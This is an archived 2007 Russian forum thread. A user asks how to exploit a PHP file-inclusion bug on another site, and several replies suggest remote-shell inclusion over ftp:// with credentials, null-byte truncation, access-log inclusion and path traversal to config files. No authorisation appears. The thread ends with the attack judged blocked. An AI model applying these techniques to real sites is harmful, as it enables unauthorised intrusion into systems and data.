FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Помогите с PHP Inj

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Помогите с PHP Inj

17.11.2007, 23:03

CraF

Познающий

Регистрация: 09.08.2005

Сообщений: 34

Провел на форуме:
74778

Репутация: 6

Помогите с PHP Inj

Вообщем есть сайт такого вида:

_http://www.site.com/site.php?page=index

после рандомного текста вводимого вместо index, выдает следующее:

Код:

Warning: main(ggsdf.php) [function.main]: failed to open stream: No such file or directory in /home/site/public_html/site.php on line 61

Warning: main(ggsdf.php) [function.main]: failed to open stream: No such file or directory in /home/site/public_html/site.php on line 61

Fatal error: main() [function.require]: Failed opening required 'ggsdf.php' (include_path='.:/usr/local/lib/php') in /home/site/public_html/site.php on line 61

Но после подстановки шелла в адресной строке, выдает следующее:

Service Temporarily Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Как это можно обойти?

17.11.2007, 23:05

NOmeR1

Познавший АНТИЧАТ

Регистрация: 02.06.2006

Сообщений: 1,188

Провел на форуме:
6023777

Репутация: 2642

Отправить сообщение для NOmeR1 с помощью ICQ

Цитата:

Сообщение от CraF

Как это можно обойти?

Попробуй указать вместо http://host/shell ссылку с фтп, т.е. - ftp://login:pass@host/shell

Кстате если укажешь site вместо index, то возможно будет рекурсия =)

17.11.2007, 23:10

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

имхо будет то же самое что и при http
Просто такая фигня появляется из-за url file access
ТС, пробуй отбросить разширение с помощью нулл-байта и ищи скрипт для аплода файлов
Или пробуй инклудить ацес_лог - что не очень действенно =\

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

17.11.2007, 23:18

CraF

Познающий

Регистрация: 09.08.2005

Сообщений: 34

Провел на форуме:
74778

Репутация: 6

Да, аналогичная ситуация что и с http =\

%00 также не помогло =\

17.11.2007, 23:30

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

Spyder, если там url file access, то %00 там никак не поможет

17.11.2007, 23:33

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

Цитата:

Сообщение от n0ne

Spyder, если там url file access, то %00 там никак не поможет

Это ты ошибаешься, Spyder все правильно сказал, он говорил про локальный инклюд, а не ты не CraF непоняли про что он говорил

__________________
Карфаген должен быть разрушен...

17.11.2007, 23:34

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

А да, извиняюсь, думал про %00 было сказано в тему про ремоут..ну да ладно)

17.11.2007, 23:57

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Посмотрел, при добовление нулл байта такая же фигня происходит
имхо ничего не сделаеш
Если конечно сможешь залить как нибудь пшп файл, что вообще нереально =)

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

18.11.2007, 00:29

Sn@k3

Познавший АНТИЧАТ

Регистрация: 13.04.2006

Сообщений: 1,738

Провел на форуме:
5151669

Репутация: 1198

Отправить сообщение для Sn@k3 с помощью ICQ

Цитата:

Сообщение от Spyder

имхо ничего не сделаеш

тут по крайней мере есть хсс

ты правильно шелл лепил? т.е. кидаешь, например на холм вида site.h17.ru/file, где на серваке уже подцепляется php, попробуй поискать файл конфига, т.е. если на сервере есть какой-нить бесплатный, или нет, борда, типа пхпбб, то попробуй вида http://site.com/../../config or http://site.com/../../config.inc нужно смотреть по ситуации, жаль локального не вытащишь. такс.

#10

18.11.2007, 00:49

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Цитата:

Сообщение от Sn@k3

Гы... xss есть, там написано же что он выводит сообщугу об ошибке, xss - 'то само сабой, там фильтр идет на http:/ ftp:/ %00 в _REQUEST кто муже magic quotes on, кароче ничего сделать нельзя да и конфиги инклюдить бесполезно, это же инклюд а не читалка

__________________
Карфаген должен быть разрушен...

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
ПомогитЕ !!! подалуста найти кряк	гейлордфакерЪ	Болталка	2	30.08.2007 14:48
ПоМоГиТе! ПЛЗ!!!	farik.aka	Уязвимости Mail-сервис	1	17.09.2006 13:00

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ